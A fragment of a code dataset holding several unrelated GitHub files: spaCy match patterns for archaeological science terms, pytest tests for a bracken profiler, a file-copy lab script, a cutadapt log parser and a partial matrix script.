\"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"manufacturing\"},\r\n\t\t\t{\"LOWER\": \"debris\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142160\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"material\"},\r\n\t\t\t{\"LOWER\": \"type\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142161\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"metal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142162\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"method\"},\r\n\t\t\t{\"LOWER\": \"of\"},\r\n\t\t\t{\"LOWER\": \"recovery\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/147276\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"micro-charcoal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142183\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"microfossils\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142164\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"micromorphology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142165\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"microscopy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142166\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineral\"},\r\n\t\t\t{\"LOWER\": \"preserved\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142167\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineral\"},\r\n\t\t\t{\"LOWER\": \"replaced\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142167\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineralised\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142169\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineralogy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142170\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mitochondrial\"},\r\n\t\t\t{\"LOWER\": \"dna\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142171\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"modification\"},\r\n\t\t\t{\"LOWER\": \"state\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/147277\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"moisture\"},\r\n\t\t\t{\"LOWER\": \"content\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142172\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"multi-element\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142173\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"natural\"},\r\n\t\t\t{\"LOWER\": \"aspects\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142174\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"non-ferrous\"},\r\n\t\t\t{\"LOWER\": \"metal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142175\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"non-metric\"},\r\n\t\t\t{\"LOWER\": \"traits\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142177\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"osl\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142176\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"obsidian\"},\r\n\t\t\t{\"LOWER\": \"hydration\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142177\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"optically\"},\r\n\t\t\t{\"LOWER\": \"stimulated\"},\r\n\t\t\t{\"LOWER\": \"luminescence\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170621\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"osteoarchaeology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142178\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"oxygen\"},\r\n\t\t\t{\"LOWER\": \"isotope\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170620\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"palaeoentomology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170613\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"palaeoenvironmental\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170612\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"palynology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142179\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"particle\"},\r\n\t\t\t{\"LOWER\": \"size\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142180\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"pathology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142980\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"peat\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/147278\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"peat\"},\r\n\t\t\t{\"LOWER\": \"humification\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142181\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ph\"},\r\n\t\t\t{\"LOWER\": \"determination\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142182\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"physical\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142183\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"phytolith\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142184\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"plant\"},\r\n\t\t\t{\"LOWER\": \"damage\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142185\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"polarised\"},\r\n\t\t\t{\"LOWER\": \"light\"},\r\n\t\t\t{\"LOWER\": \"microscopy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142186\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"pollen\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144523\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"polymineral\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142187\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"potassium\"},\r\n\t\t\t{\"LOWER\": \"argon\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144516\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"pottery\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144520\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"quartz\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"radiocarbon\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148434\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"residue\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142189\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"roundwood\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142191\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"s.e.m.\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142191\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"sem\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142191\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"scanning\"},\r\n\t\t\t{\"LOWER\": \"electron\"},\r\n\t\t\t{\"LOWER\": \"microscopy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142193\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"shell\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142194\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"silicified\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142195\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"silver\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142196\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"skin\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170642\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"slag\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142197\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"soil\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142198\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"specialist\"},\r\n\t\t\t{\"LOWER\": \"sampling\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142199\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"spot\"},\r\n\t\t\t{\"LOWER\": \"test\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142200\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"stable\"},\r\n\t\t\t{\"LOWER\": \"isotope\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142201\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"stratigraphic\"},\r\n\t\t\t{\"LOWER\": \"description\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142203\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tl\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142202\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tephrochronology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142203\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"thermoluminescence\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142205\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tool\"},\r\n\t\t\t{\"LOWER\": \"marked\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142205\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tool\"},\r\n\t\t\t{\"LOWER\": \"marks\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142207\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tooth\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142208\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"total\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142209\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tree-ring\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142209\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tree-ring\"},\r\n\t\t\t{\"LOWER\": \"studies\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142979\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tufaceous\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142211\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"twig\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142212\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"uranium\"},\r\n\t\t\t{\"LOWER\": \"series\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142102\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"waterlogged\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148328\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"waterworn\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142214\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"wood\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142215\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"worked\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142216\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"x-radiography\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142217\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"x-ray\"},\r\n\t\t\t{\"LOWER\": \"diffraction\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142218\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"x-ray\"},\r\n\t\t\t{\"LOWER\": \"fluorescence\"},\r\n\t\t\t{\"LOWER\": \"spectrometry\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142217\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"xrd\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142218\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"xrf\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144522\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"zircon\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170616\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"zooarchaeology\"}\r\n\t\t] \r\n }\r\n\r\n]","repo_name":"cbinding/rematch2","sub_path":"rematch2/spacypatterns/patterns_en_FISH_ARCHSCIENCE.py","file_name":"patterns_en_FISH_ARCHSCIENCE.py","file_ext":"py","file_size_in_byte":29423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22127829679","text":"\"\"\" Tests \"\"\"\n\nimport os\nimport random\nimport re\nimport shutil\nimport string\nfrom subprocess import getstatusoutput\n\nPRG = './bracken_profiler.py'\nINPUT1 = 'tests/inputs/bracken_profiler/input_1.txt'\nTAX = 'tests/inputs/bracken_profiler/taxonomy.csv'\n\n\n# --------------------------------------------------\ndef test_exists():\n \"\"\" Program exists \"\"\"\n\n assert os.path.isfile(PRG)\n\n\n# --------------------------------------------------\ndef test_testing_environment():\n \"\"\" Test files are in place \"\"\"\n\n assert os.path.isfile(INPUT1)\n assert os.path.isfile(TAX)\n\n\n# --------------------------------------------------\ndef test_usage():\n \"\"\" Usage \"\"\"\n\n for flag in ['-h', '--help']:\n retval, out = getstatusoutput(f'{PRG} {flag}')\n assert retval == 0\n assert out.lower().startswith('usage')\n\n\n# --------------------------------------------------\ndef test_bad_file():\n \"\"\" Bad input file \"\"\"\n\n bad = random_string()\n\n retval, out = getstatusoutput(f'{PRG} -t {TAX} {bad}')\n assert retval != 0\n assert out.lower().startswith('usage:')\n assert re.search('No such file', out)\n assert re.search(bad, out)\n\n\n# --------------------------------------------------\ndef test_bad_taxonomy_file():\n \"\"\" Bad input file \"\"\"\n\n bad = random_string()\n\n retval, out = getstatusoutput(f'{PRG} -t {bad} {INPUT1}')\n assert retval != 0\n assert out.lower().startswith('usage:')\n assert re.search('No such file', out)\n assert re.search(bad, out)\n\n\n# --------------------------------------------------\ndef test_runs_okay():\n \"\"\" Run the tool \"\"\"\n\n out_dir = random_string()\n\n try:\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n\n rv, out = getstatusoutput(\n f'{PRG} -np 1 -o {out_dir} -t {TAX} {INPUT1}')\n\n assert rv == 0\n glob_file = os.path.join(out_dir, 'input_1_files.txt')\n profile_file = os.path.join(out_dir, 'input_1_profile.txt')\n assert re.search(f'Done. Wrote 1 profile to {out_dir}', out)\n assert os.path.isdir(out_dir)\n assert os.path.isfile(glob_file)\n assert os.path.isfile(profile_file)\n header = ('filename,accession\\n')\n assert open(glob_file).readlines()[0] == header\n profile_lines = open(profile_file).read().count('\\n')\n glob_lines = open(glob_file).read().count('\\n')\n assert glob_lines == profile_lines + 1\n\n finally:\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n\n\n# --------------------------------------------------\ndef random_string() -> str:\n \"\"\" Generate a random string \"\"\"\n\n return ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))\n","repo_name":"hurwitzlab/phage_detection_benchmarks","sub_path":"src/simulate_metagenomes/tests/bracken_profiler_test.py","file_name":"bracken_profiler_test.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36764649633","text":"#!/usr/bin/env python\n\nimport os\n\ndef listfiles():\n \"\"\"function to list absolute path of all files in current directory\"\"\"\n cwd = os.getcwd()\n files = os.listdir(cwd)\n for file in files:\n print(os.path.abspath(file))\n\n\ndef filecopy():\n \"\"\"function for doing a streaming binary file copy\"\"\"\n source = input('Please enter the name of the file to be copied:\\n')\n if not os.path.isfile(source):\n print('Sorry, source file does not exist.\\n')\n filecopy()\n return\n destfile = input('Please enter the name that you would like for the destination file:\\n')\n\n dest = open(destfile, 'bw+')\n with open(source, 'rb') as file:\n print('Copying file...', end='', flush=True)\n while True:\n buffer = file.read(64)\n print('.', end='', flush=True)\n if not buffer:\n print('')\n print('File finished copying!')\n break\n print('.', end='', flush=True)\n dest.write(buffer)\n\n\ndef main():\n \"\"\"main function for this lab\"\"\"\n print('Please make a selection:')\n print('1. List the files in the current directory')\n print('2. Use Brandon\\'s patent pending (just kidding) streaming file copy')\n choice = input('')\n if choice == '1':\n listfiles()\n elif choice == '2':\n filecopy()\n else:\n print('Sorry, ' + choice + ' is not a valid selection, please choose 1 or 2')\n main()\n return\n\nif __name__ == '__main__':\n main()","repo_name":"UWPCE-PythonCert/Py100-2017q1","sub_path":"bmarlow/Week 4/file_lab.py","file_name":"file_lab.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"7547916659","text":"#!/usr/bin/env python3\nimport os\n#import sys\n\n#ifile=\"/home/jan/playground/TERA-Seq_snakemake/data/samples/hsa.dRNASeq.HeLa.polyA.CIP.decap.REL5.long.1/log/cutadapt.log\"\n\ndef cutadapt_parse_lens(ifile, library, ofile):\n # Read ifile line by lin\n with open(ifile, 'r') as f:\n content = f.read()\n\n # Find the adapter trimming section in the output\n start_index = content.find('length\\t')\n end_index = len(content)\n\n # Extract the adapter trimming information\n adapter_info = content[start_index:end_index]\n\n # Split the adapter information into lines\n adapter_lines = adapter_info.split('\\n')\n\n # Extract the length and number of trimmed adapters for each adapter sequence\n with open(ofile, 'w') as out:\n out.write(\"library\" + \"\\t\" + adapter_lines[0] + \"\\n\")\n for line in adapter_lines:\n if line[:1].isdigit():\n length = line.split('\\t')[0]\n count = line.split('\\t')[1]\n expect = line.split('\\t')[2]\n max_err = line.split('\\t')[3]\n err_counts = line.split('\\t')[4]\n out.write('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n'.format(library, length, count, expect, max_err, err_counts))\n\nusage = \"Usage: python3 \" + os.path.basename(__file__) + \" cutadapt.log samplename\"\n\nifile=snakemake.input[0]\nlibrary=snakemake.wildcards.sample\nofile=snakemake.output[0]\n\ncutadapt_parse_lens(ifile, library, ofile)\n","repo_name":"opplatek/TERA-Seq_snakemake","sub_path":"workflow/scripts/parse-cutadapt-lens.py","file_name":"parse-cutadapt-lens.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25616447644","text":"def read_matrix():\n rows = int(input())\n matrix = []\n for _ in range(rows):\n matrix.append([int(x) for x in input().split()])\n return matrix\n\ndef print_matrix(matrix):\n for row in matrix:\n print(*row)\n\nmatrix = read_matrix()\n\ncommand, *other = input().split()\n\nwhile command != \"END\":\n row, col, value = map(int, other)\n if not (0 <= row < len(matrix) and 0 